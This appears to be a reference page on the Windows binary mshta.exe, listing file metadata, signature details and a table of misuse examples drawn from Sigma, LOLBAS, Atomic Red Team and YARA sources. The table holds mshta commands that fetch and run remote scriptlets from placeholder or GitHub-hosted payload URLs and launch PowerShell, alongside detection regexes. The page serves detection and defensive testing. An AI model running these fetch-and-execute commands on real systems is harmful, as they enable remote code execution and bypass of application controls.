mshta.exe

  • File Path: C:\WINDOWS\SysWOW64\mshta.exe
  • Description: Microsoft (R) HTML Application host

Runtime Data

Loaded Modules:

| Path |
|---|
| C:\WINDOWS\SYSTEM32\ntdll.dll |
| C:\WINDOWS\System32\wow64.dll |
| C:\WINDOWS\System32\wow64base.dll |
| C:\WINDOWS\System32\wow64con.dll |
| C:\WINDOWS\System32\wow64cpu.dll |
| C:\WINDOWS\System32\wow64win.dll |
| C:\WINDOWS\SysWOW64\mshta.exe |

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: MSHTA.EXE.MUI
  • Product Name: Internet Explorer
  • Company Name: Microsoft Corporation
  • File Version: 11.00.22000.1 (WinBuild.160101.0800)
  • Product Version: 11.00.22000.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/73
  • VirusTotal Link: https://www.virustotal.com/gui/file/9820174c7ec2fc3b3410609045bbd56a8f9d20e6ae52515aba7c9e6b60312d97/detection

File Similarity (ssdeep match)

| File | Score |
|---|---|
| C:\Windows\SysWOW64\mshta.exe | 41 |
| C:\windows\SysWOW64\mshta.exe | 38 |

Possible Misuse

The following table contains possible examples of mshta.exe being misused. While mshta.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

| Source | Source File | Example | License |
|---|---|---|---|
| sigma | godmode_sigma_rule.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_mshta_services_security.yml | title: Invoke-Obfuscation Via Use MSHTA | DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_mshta_services_security.yml | description: Detects Obfuscated Powershell via use MSHTA in Scripts | DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_mshta_services_security.yml | - 'mshta' | DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_mshta_services.yml | title: Invoke-Obfuscation Via Use MSHTA | DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_mshta_services.yml | description: Detects Obfuscated Powershell via use MSHTA in Scripts | DRL 1.0 |
| sigma | win_invoke_obfuscation_via_use_mshta_services.yml | - 'mshta' | DRL 1.0 |
| sigma | sysmon_cactustorch.yml | - '\System32\mshta.exe' | DRL 1.0 |
| sigma | sysmon_suspicious_remote_thread.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | file_event_win_susp_clr_logs.yml | - 'mshta' | DRL 1.0 |
| sigma | file_event_win_win_shell_write_susp_directory.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | image_load_suspicious_dbghelp_dbgcore_load.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | image_load_susp_script_dotnet_clr_dll_load.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | posh_pm_invoke_obfuscation_via_use_mhsta.yml | title: Invoke-Obfuscation Via Use MSHTA | DRL 1.0 |
| sigma | posh_pm_invoke_obfuscation_via_use_mhsta.yml | description: Detects Obfuscated Powershell via use MSHTA in Scripts | DRL 1.0 |
| sigma | posh_pm_invoke_obfuscation_via_use_mhsta.yml | Payload\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' | DRL 1.0 |
| sigma | posh_ps_invoke_obfuscation_via_use_mhsta.yml | title: Invoke-Obfuscation Via Use MSHTA | DRL 1.0 |
| sigma | posh_ps_invoke_obfuscation_via_use_mhsta.yml | description: Detects Obfuscated Powershell via use MSHTA in Scripts | DRL 1.0 |
| sigma | posh_ps_invoke_obfuscation_via_use_mhsta.yml | ScriptBlockText\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' | DRL 1.0 |
| sigma | proc_creation_win_apt_babyshark.yml | - powershell.exe mshta.exe http* | DRL 1.0 |
| sigma | proc_creation_win_apt_lazarus_activity_apr21.yml | - 'mshta' | DRL 1.0 |
| sigma | proc_creation_win_apt_lazarus_activity_apr21.yml | - 'C:\Windows\System32\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_apt_ta505_dropper.yml | description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents | DRL 1.0 |
| sigma | proc_creation_win_apt_ta505_dropper.yml | Image\|endswith: '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_exploit_cve_2017_11882.yml | description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe | DRL 1.0 |
| sigma | proc_creation_win_invoke_obfuscation_via_use_mhsta.yml | title: Invoke-Obfuscation Via Use MSHTA | DRL 1.0 |
| sigma | proc_creation_win_invoke_obfuscation_via_use_mhsta.yml | description: Detects Obfuscated Powershell via use MSHTA in Scripts | DRL 1.0 |
| sigma | proc_creation_win_invoke_obfuscation_via_use_mhsta.yml | CommandLine\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' | DRL 1.0 |
| sigma | proc_creation_win_lethalhta.yml | title: MSHTA Spwaned by SVCHOST | DRL 1.0 |
| sigma | proc_creation_win_lethalhta.yml | description: Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report | DRL 1.0 |
| sigma | proc_creation_win_lethalhta.yml | Image\|endswith: '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_lolbins_by_office_applications.yml | - 'mshta' | DRL 1.0 |
| sigma | proc_creation_win_lolbins_with_wmiprvse_parent_process.yml | - 'mshta' | DRL 1.0 |
| sigma | proc_creation_win_mshta_javascript.yml | title: Mshta JavaScript Execution | DRL 1.0 |
| sigma | proc_creation_win_mshta_javascript.yml | description: Identifies suspicious mshta.exe commands. | DRL 1.0 |
| sigma | proc_creation_win_mshta_javascript.yml | Image\|endswith: '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_mshta_spawn_shell.yml | title: MSHTA Spawning Windows Shell | DRL 1.0 |
| sigma | proc_creation_win_mshta_spawn_shell.yml | description: Detects a Windows command line executable started from MSHTA | DRL 1.0 |
| sigma | proc_creation_win_mshta_spawn_shell.yml | ParentImage\|endswith: '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml | - 'mshta' | DRL 1.0 |
| sigma | proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml | - '*mshta*' | DRL 1.0 |
| sigma | proc_creation_win_office_shell.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_outlook_shell.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_possible_applocker_bypass.yml | #- '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_public_folder_parent.yml | - 'mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_renamed_binary.yml | - 'mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_renamed_binary.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - 'mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_renamed_binary_highly_relevant.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_script_event_consumer_spawn.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_shell_spawn_mshta.yml | title: Mshta Spawning Windows Shell | DRL 1.0 |
| sigma | proc_creation_win_shell_spawn_mshta.yml | description: Detects a suspicious child process of a mshta.exe process | DRL 1.0 |
| sigma | proc_creation_win_shell_spawn_mshta.yml | ParentImage\|endswith: '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_shell_spawn_susp_program.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_covenant.yml | - 'mshta file.hta' | DRL 1.0 |
| sigma | proc_creation_win_susp_csc.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_execution.yml | title: MSHTA Suspicious Execution 01 | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_execution.yml | description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_execution.yml | Image\|endswith: '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_pattern.yml | title: Suspicious MSHTA Process Patterns | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_pattern.yml | description: Detects suspicious mshta process patterns | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_pattern.yml | - https://www.echotrail.io/insights/search/mshta.exe | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_pattern.yml | Image\|endswith: '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_pattern.yml | - 'mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_mshta_pattern.yml | - 'mshta' | DRL 1.0 |
| sigma | proc_creation_win_susp_powershell_parent_process.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_regsvr32_anomalies.yml | ParentImage\|endswith: '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_script_exec_from_env_folder.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_script_exec_from_env_folder.yml | - 'mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_script_exec_from_temp.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_servu_process_pattern.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_by_java.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_shell_spawn_by_java_keytool.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_susp_system_user_anomaly.yml | - '\mshta.exe' | DRL 1.0 |
| sigma | proc_creation_win_task_folder_evasion.yml | description: The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr | DRL 1.0 |
| sigma | driver_load_invoke_obfuscation_via_use_mshta_services.yml | title: Invoke-Obfuscation Via Use MSHTA | DRL 1.0 |
| sigma | driver_load_invoke_obfuscation_via_use_mshta_services.yml | description: Detects Obfuscated Powershell via use MSHTA in Scripts | DRL 1.0 |
| sigma | driver_load_invoke_obfuscation_via_use_mshta_services.yml | ImagePath\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' | DRL 1.0 |
| LOLBAS | Mshta.yml | Name: Mshta.exe | |
| LOLBAS | Mshta.yml | - Command: mshta.exe evilfile.hta | |
| LOLBAS | Mshta.yml | - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) | |
| LOLBAS | Mshta.yml | - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); | |
| LOLBAS | Mshta.yml | - Command: mshta.exe "C:\ads\file.txt:file.hta" | |
| LOLBAS | Mshta.yml | - Path: C:\Windows\System32\mshta.exe | |
| LOLBAS | Mshta.yml | - Path: C:\Windows\SysWOW64\mshta.exe | |
| LOLBAS | Mshta.yml | - IOC: mshta.exe executing raw or obfuscated script within the command-line | |
| LOLBAS | Mshta.yml | - IOC: DotNet CLR libraries loaded into mshta.exe | |
| LOLBAS | Mshta.yml | - IOC: DotNet CLR Usage Log - mshta.exe.log | |
| LOLBAS | Mshta.yml | - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct | |
| LOLBAS | Mshtml.yml | Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box). | |
| LOLBAS | Url.yml | Usecase: Invoke an HTML Application via mshta.exe (Default Handler). | |
| atomic-red-team | index.md | - T1218.005 Mshta | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #10: Mshta used to Execute PowerShell [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | index.md | - Atomic Test #9: Powershell invoke mshta.exe download [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - T1218.005 Mshta | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #10: Mshta used to Execute PowerShell [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-index.md | - Atomic Test #9: Powershell invoke mshta.exe download [windows] | MIT License. © 2018 Red Canary |
| atomic-red-team | matrix.md | \| \| \| SSH Authorized Keys \| Systemd Timers \| Mshta \| \| \| \| \| \| \| \| | MIT License. © 2018 Red Canary |
| atomic-red-team | windows-matrix.md | \| \| \| Screensaver \| Time Providers CONTRIBUTE A TEST \| Mshta \| \| \| \| \| \| \| \| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.001.md | - Atomic Test #9 - Powershell invoke mshta.exe download | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.001.md | ## Atomic Test #9 - Powershell invoke mshta.exe download | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.001.md | Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.001.md | \| url \| url of payload to execute \| Url \| https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.001.md | C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()" | MIT License. © 2018 Red Canary |
| atomic-red-team | T1059.005.md | Get-WmiObject win32_process \| Where-Object {$_.CommandLine -like "*mshta*"} \| % { "$(Stop-Process $_.ProcessID)" } \| Out-Null | MIT License. © 2018 Red Canary |
| atomic-red-team | T1204.002.md | Stop-Process -name mshta | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | # T1218.005 - Mshta | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | - Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | - Atomic Test #2 - Mshta executes VBScript to execute malicious command | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | - Atomic Test #3 - Mshta Executes Remote HTML Application (HTA) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | - Atomic Test #10 - Mshta used to Execute PowerShell | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | ## Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | \| file_url \| location of the payload \| Url \| https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close(); | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | ## Atomic Test #2 - Mshta executes VBScript to execute malicious command | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file PathToAtomicsFolder\T1218.005\src\powershell.ps1"":close") | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | ## Atomic Test #3 - Mshta Executes Remote HTML Application (HTA) | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | mshta "#{temp_file}" | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | \| mshta_file_path \| Location of mshta.exe \| String \| $env:windir\system32\mshta.exe\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | \| mshta_file_path \| Location of mshta.exe \| Path \| $env:windir\system32\mshta.exe\| | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | ## Atomic Test #10 - Mshta used to Execute PowerShell | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary. | MIT License. © 2018 Red Canary |
| atomic-red-team | T1218.005.md | mshta.exe "about:'" | MIT License. © 2018 Red Canary |
| signature-base | apt_babyshark.yar | $x2 = /mshta.exe http:\/\/[a-z0-9.\/]{5,30}.hta/ | CC BY-NC 4.0 |
| signature-base | apt_fin7.yar | $x7 = "7374656d33325c6d736874612e657865000023002e002e005c002e002e005c002e002e005c00570069006e0064006f00770073005c005300790073007400" ascii /* hex encoded string 'stem32\mshta.exe#......\Windows\Syst' */ | CC BY-NC 4.0 |
| signature-base | apt_leviathan.yar | $x2 = ".Run "taskkill /im mshta.exe" ascii | CC BY-NC 4.0 |
| signature-base | exploit_cve_2017_11882.yar | $x1 = "4d534854412e4558452068747470" /* MSHTA.EXE http */ | CC BY-NC 4.0 |
| signature-base | exploit_cve_2017_11882.yar | $x2 = "6d736874612e6578652068747470" /* mshta.exe http */ | CC BY-NC 4.0 |
| signature-base | exploit_cve_2017_11882.yar | $x3 = "6d736874612068747470" /* mshta http */ | CC BY-NC 4.0 |
| signature-base | exploit_cve_2017_11882.yar | $x4 = "4d534854412068747470" /* MSHTA http */ | CC BY-NC 4.0 |
| signature-base | exploit_cve_2017_11882.yar | $mshta = "mshta" | CC BY-NC 4.0 |
| signature-base | exploit_cve_2017_11882.yar | any of ($mshta, $http, $https, $cmd, $pwsh, $exe) and any of ($equation1, $equation2) and $address | CC BY-NC 4.0 |
| signature-base | exploit_cve_2017_8759.yar | $s2 = /<soap:address location="http[s]?:\/\/[^"]{8,140}mshta.exe"/ ascii wide | CC BY-NC 4.0 |
| signature-base | gen_mal_scripts.yar | description = "Detects MSHTA Bypass" | CC BY-NC 4.0 |
| signature-base | gen_mal_scripts.yar | $s3 = "/c start mshta j" ascii nocase | CC BY-NC 4.0 |
| signature-base | gen_url_persitence.yar | $file1 = /\x0a\x0d\s=[^\x0d](powershell\|cmd\|certutil\|mshta\|wscript\|cscript\|rundll32\|wmic\|regsvr32\|msbuild)(.exe\|)[^\x0d]{2,50}\x0d/ nocase | CC BY-NC 4.0 |

MIT License. Copyright (c) 2020-2021 Strontic.